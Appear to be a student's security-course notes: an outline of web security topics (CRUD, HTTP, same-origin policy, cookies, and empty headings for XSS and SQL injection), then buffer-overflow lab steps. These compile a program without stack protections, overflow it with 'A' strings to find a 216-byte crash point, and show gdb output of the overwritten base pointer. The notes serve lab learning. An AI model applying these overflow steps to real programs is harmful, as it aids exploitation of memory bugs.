---
tags: 47-SSA
---
Q:
1. How to learn reverse engineering/assembly fast?
2. How to tackle RE ctf?
# 4: Web Security
## Web Security Model
### CRUD operation
The basic operations that can be performed on data in a database or other persistent storage system.
| CRUD | Action |
|:------ |:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Create | This operation refers to the action of adding new data to the system. It typically involves inserting new records or objects into a database or other storage system. |
| Read | This operation refers to the action of retrieving existing data from the system. It typically involves querying a database or other storage system to retrieve records or objects that match certain criteria. |
| Update | This operation refers to the action of modifying existing data in the system. It typically involves updating the values of one or more fields in a database or other storage system. |
| Delete | This operation refers to the action of removing existing data from the system. It typically involves deleting one or more records or objects from a database or other storage system. |
### HTTP request
**stateless protocol**: independent from pervious or future request.
- GET
The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.
- HEAD
The HEAD method asks for a response identical to a GET request, but without the response body.
- POST
The POST method submits an entity to the specified resource, often causing a change in state or side effects on the server.
- PUT
### Securing browsers
[World Wide Web Consortium / W3C](https://www.w3.org/)
...
### SOP (Same Origin Policy)
Rule: A script can only access a resource if they have the same origin.
- XMLHttpResponse() what is?
With the XMLHttpRequest object, a web page can send an HTTP request to a server and receive a response back in various formats, such as plain text, XML, HTML, or JSON. The response can be used to update the page content or perform other actions based on the server's response.
### Cookies
**add state**
#### Example
| - | - |
| -------- |:-------------------------------------:|
| Name | session-token |
| Content | "s7yZiOvFm4YymG" |
| Domain | .amazon.com |
| Path | / |
| Send For | Any type of connection |
| Expires | Monday, September 08, 2031 7:19:41 PM |
### Usage
- authentication, tracking, maintain user information
- Only the website that created the cookie can read it ??
## Cross-site request forgery
use image as an example
## Cross-site scripting
### Reflected XSS (Non-Persistent or Type I)
### Stored XSS (AKA Persistent or Type II)
### DOM XSS (Type-0)
### Effect of the attack
## SQL injection
### In-band SQLi (Classic SQLi)
#### Error-based SQLi
#### Union-based SQLi
### Inferential SQLi (Blind SQLi)
#### Boolean-based (content-based)
#### Time-based Blind SQLi
### Out-of-band SQLi
# Lab 4: Buffer Overflow II
Q: ask coursework ex1 written permission
## Ex1
```
gcc vuln.c -o vuln -ggdb -fno-stack-protector -z execstack -m64 -mpreferred-stack-boundary=4
```
### **216**
> $ ./vuln $(python -c 'print("A"*215)')
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> $ ./vuln $(python -c 'print("A"*216)')
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
> run $(python -c 'print("A"*216)')
> run $(python -c 'print("A"*200)')
> $ ./vuln $(python -c 'print("A"*217)')
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Illegal instruction (core dumped)
200
> (gdb) x /60wx $sp
```
0x7fffffffddb0: 0xffffdf78 0x00007fff 0x00000000 0x00000002
0x7fffffffddc0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdde0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddf0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde00: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde10: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde20: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde30: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde40: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde50: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde60: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde70: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde80: 0x41414141 0x41414141 0x00000000 0x00000000
0x7fffffffde90: 0x555547a0 0x00005555 0xf7a03bf7 0x00007fff
```
> (gdb) stepi
> (gdb) info reg rbp rip
```
rbp 0x5555555547a0 0x5555555547a0 <__libc_csu_init>
rip 0x555555554799 0x555555554799 <main+127>
```
> (gdb) stepi
> (gdb) info reg rbp rip
```
rbp 0x4141414141414141 0x4141414141414141
rip 0x7ffff7a03b00 0x7ffff7a03b00 <_dl_start>
```
Sign in with Wallet
Connect another wallet